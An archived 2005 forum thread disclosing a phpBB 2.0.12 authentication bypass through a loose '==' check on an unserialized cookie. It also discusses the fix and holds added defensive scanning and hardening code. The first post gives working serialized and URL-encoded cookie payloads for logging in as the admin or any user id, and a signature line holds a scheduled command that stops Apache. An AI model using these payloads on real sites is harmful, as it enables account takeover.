phpbb v. 2.0.12 and earlier authentication bypass

Posted: Sat Feb 26, 2005 11:20 pm
Heintz
Valuable expert
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden

Bug author: Heintz (Henno Joosep)
Related site: http://www.waraxe.us
Date of finding: 24.02.2005

problem is in sessions.php which is in /includes catalog.

$sessiondata = isset($HTTP_COOKIE_VARS[$cookiename . '_data']) ? unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . '_data'])) : array();

here we see an array unserialized

if( $sessiondata['autologinid'] == $auto_login_key )
{
    // autologinid matches password
    $login = 1;
    $enable_autologin = 1;
}


problem is with if() using == operator which considers the statement
true if one side is boolean(true), and that we can achieve by unserializing
a bool instead of empty string.

exploitation:
this can be normal admin session cookie.
a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:1:"2";}

attacker would make array with autologinid as key to boolean(true) so:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}

for this to work in real situation it must be urlencoded, and this is how it should look like to
obtain a user with id 2 (usually admin):
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D


to change the users id bigger, change the
number in end,

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"7";}

if dealing with higher ids you must specify s:N (N as how many decimal places id has)
example below:

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:4:"1234";}

i stated using "===" as conditional operator as a "quick fix", which phpbb
team used (they didn't have time to explore the bug in depth, look below for notes).

originally i tried/explored advantages to use unserialize
to unserialize database objects, but using objects as arrays creates fatal error
(possible full path disclosure???).

Notes:
software authors decided not to credit me cause i posted info public,
not giving them enough time,

-- brought up --


Last edited by Heintz on Sat Apr 09, 2005 5:46 pm; edited 4 times in total

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
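
A defender-side check for the cookie manipulation described in the post above, as an added example that is not part of the original thread or of phpBB: it scans request log lines for a `_data` cookie whose autologinid field is serialized as anything other than a string. The cookie name `forum_data`, the log layout and the function names are assumptions, and the sample lines are constructed.

```php
<?php
// Added example, not phpBB code. Cookie name "forum_data", the log layout
// and all function names are assumptions; the sample lines are constructed.

// Collect the serialized type tags that follow the autologinid key.
// Decoding mirrors what the quoted code applies before unserialize().
function autologinid_type_tags(string $rawCookieValue): array
{
    $decoded = stripslashes(rawurldecode($rawCookieValue));
    preg_match_all('/s:11:"autologinid";([A-Za-z])[:;]/', $decoded, $m);
    return $m[1];
}

// A legitimate cookie carries autologinid as a string (tag "s").
// Any other tag (b, i, d, N, a, O) is worth an alert.
function is_suspicious(string $rawCookieValue): bool
{
    foreach (autologinid_type_tags($rawCookieValue) as $tag) {
        if ($tag !== 's') {
            return true;
        }
    }
    return false;
}

// Return the 1-based numbers of log lines carrying a suspicious cookie.
function scan_log(array $lines, string $cookieName): array
{
    $pattern = '/\b' . preg_quote($cookieName, '/') . '=([^;\s"]+)/';
    $hits = [];
    foreach ($lines as $n => $line) {
        if (preg_match($pattern, $line, $m) && is_suspicious($m[1])) {
            $hits[] = $n + 1;
        }
    }
    return $hits;
}

// Constructed sample log: one ordinary cookie, one with a boolean autologinid.
$normal = rawurlencode('a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:1:"5";}');
$bool   = rawurlencode('a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}');
$log = [
    '192.0.2.10 "GET /index.php" 200 "Cookie: forum_data=' . $normal . '; forum_sid=abc"',
    '198.51.100.7 "GET /index.php" 200 "Cookie: forum_data=' . $bool . '"',
];
print_r(scan_log($log, 'forum_data'));
```

The pattern match is a triage heuristic over raw cookie text; it does not replace fixing the comparison in the application.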

Posted: Sun Feb 27, 2005 3:32 pm
LINUX
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman

Smile Very Happy full test and work perfect excellent work

Posted: Sun Feb 27, 2005 5:28 pm
Injector
Active user
Joined: Dec 29, 2004
Posts: 49

i decoded both and tried to analyze it but still i don't get how to do it. What if I don't want user id 2 what if I want user id 7. How do i do such?

Posted: Mon Feb 28, 2005 12:31 am
Grullanetx
Beginner
Joined: Feb 18, 2005
Posts: 2

Hi all!

phpBB 2.0.13 released - Critical Update

path disclosure bug in viewtopic.php fixed too!

Saludos!

Posted: Mon Feb 28, 2005 4:37 am
Exoduks
Beginner
Joined: Jan 12, 2005
Posts: 3

Does anyone know how to exploit this session handling bug?

Posted: Mon Feb 28, 2005 5:13 am
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

hum, nice research you've done there

i've tried to download that version, but the development team already updated it Smile

now i try a new one (2.0.13)

long time no play with PHPbb Smile (even though my forum uses it too Sad )

_________________
IO::y3dips->new(http://clog.ammar.web.id);

For comparing Strings use ===
Posted: Mon Feb 28, 2005 8:40 am
Zeelock
Active user
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night

Heintz Great Job.

Even if it's a common trick and well documented I didn't notice it yet ( Shocked ).

This error is very common in converting perl scripts into php.

For more info:

http://www.php.net/manual/it/language.operators.comparison.php

Quote:
jwhiting at hampshire dot edu
09-Dec-2003 06:31
note: the behavior below is documented in the appendix K about type comparisons, but since it is somewhat buried i thought i should raise it here for people since it threw me for a loop until i figured it out completely.

just to clarify a tricky point about the == comparison operator when dealing with strings and numbers:

('some string' == 0) returns TRUE

however, ('123' == 0) returns FALSE

also note that ((int) 'some string') returns 0

and ((int) '123') returns 123

the behavior makes sense but you must be careful when comparing strings to numbers, e.g. when you're comparing a request variable which you expect to be numeric. it's easy to fall into the trap of:

if ($_GET['myvar']==0) dosomething();

as this will dosomething() even when $_GET['myvar'] is 'some string' and clearly not the value 0

i was getting lazy with my types since php vars are so flexible, so be warned to pay attention to the details...


Exploit n. 2 Censored.....


Last edited by Zeelock on Mon Feb 28, 2005 1:54 pm; edited 6 times in total

_________________
If it seems to be impossible, just step up your level!

Posted: Mon Feb 28, 2005 10:37 am
sygma
Regular user
Joined: Nov 21, 2004
Posts: 7

why was the info censored ? could someone please PM the info ? thanks.

_________________
[i]no word to save thee[/i]

Posted: Mon Feb 28, 2005 11:03 am
Zeelock
Active user
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night

I think that Janek censored the message, because it's really harmful at the moment

_________________
If it seems to be impossible, just step up your level!

Posted: Mon Feb 28, 2005 1:51 pm
Heintz
Valuable expert
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden

i was the one censoring it, cause phpbb guys didn't like the idea posting before/same time about the issue.

and i would appreciate if we do not provide exploitation info in some amount of time (2 days).

i thought better of people but it seems there just too many script kiddies outside who start making damage whenever possible. Sad


http://www.phpbb.com/phpBB/viewtopic.php?t=267563


Last edited by Heintz on Mon Feb 28, 2005 3:37 pm; edited 1 time in total

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"

Posted: Mon Feb 28, 2005 1:53 pm
Zeelock
Active user
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night

If you want I'll censor the info as well

_________________
If it seems to be impossible, just step up your level!

Posted: Thu Mar 03, 2005 1:05 pm
Heintz
Valuable expert
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden

---move---

Notes:
software authors decided not to credit me cause i posted info public,
not giving them enough time,


Last edited by Heintz on Wed May 04, 2005 1:26 am; edited 2 times in total

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"

Posted: Thu Mar 03, 2005 2:23 pm
lone_wolf
Regular user
Joined: Feb 20, 2005
Posts: 9

Heintz, what exactly does the triple equal from the "quick fix" do? Is there some way to cheat it?

Posted: Thu Mar 03, 2005 2:39 pm
lone_wolf
Regular user
Joined: Feb 20, 2005
Posts: 9

This looks pretty hopeless (from the "Boolean" manual):


/* Note the triple equal sign, this is the "exactly equal to" operator,
which checks NOT JUST FOR EQUALITY, BUT FOR TYPE. Using it
ensures that $bool doesn't get converted to a boolean
for the comparison: $bool===true is only true
if $bool is a true boolean, whereas $bool==true
is true for any non-empty string (except "0").
*/
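
The `if()` check quoted in the first post and the `===` behaviour described in the manual note above, side by side, as an added example that is not phpBB code and not part of the thread. The function names and the stored key are hypothetical; the hardened variant goes one step beyond the bare `===` quick fix by validating the field type and decoding with `allowed_classes` disabled (PHP 7.0 or later).

```php
<?php
// Added example, not phpBB source. Function names are hypothetical and the
// stored key is a constructed stand-in.

// The check as quoted in the first post: loose comparison.
function autologin_matches_loose(array $sessiondata, string $auto_login_key): bool
{
    return $sessiondata['autologinid'] == $auto_login_key;
}

// Hardened: the cookie field must be a non-empty string before comparison,
// and the comparison itself is type-safe and constant-time.
function autologin_matches_strict(array $sessiondata, string $auto_login_key): bool
{
    $candidate = $sessiondata['autologinid'] ?? null;
    if (!is_string($candidate) || $candidate === '' || $auto_login_key === '') {
        return false;
    }
    return hash_equals($auto_login_key, $candidate);
}

// Decode the cookie without instantiating objects; anything that is not an
// array is treated as an empty session.
function load_sessiondata(string $cookie): array
{
    $data = @unserialize($cookie, ['allowed_classes' => false]);
    return is_array($data) ? $data : [];
}

$stored_key = md5('constructed-password'); // constructed stand-in for $auto_login_key
$cookies = [
    'normal, no autologin' => 'a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:1:"2";}',
    'boolean autologinid'  => 'a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}',
    'correct key'          => serialize(['autologinid' => $stored_key, 'userid' => '2']),
];
foreach ($cookies as $label => $cookie) {
    $data = load_sessiondata($cookie);
    printf("%-22s loose=%s strict=%s\n", $label,
        var_export(autologin_matches_loose($data, $stored_key), true),
        var_export(autologin_matches_strict($data, $stored_key), true));
}
```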

Posted: Sun Mar 13, 2005 4:42 pm
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

Heintz wrote:

<-- message truncated --->

i stated using "===" as conditional operator as a "quick fix", which phpbb
team used (they didn't have time to explore the bug in depth, look below for notes).

originally i tried/explored advantages to use unserialize
to unserialize database objects, but using objects as arrays creates fatal error
(possible full path disclosure???).

Notes:
software authors decided not to credit me cause i posted info public,
thus not giving them enough time (big mistake by me), and therefore there may be stealers
claiming the bug to be theirs.


have another way to fix it, coz i found the same error as you do

_________________
IO::y3dips->new(http://clog.ammar.web.id);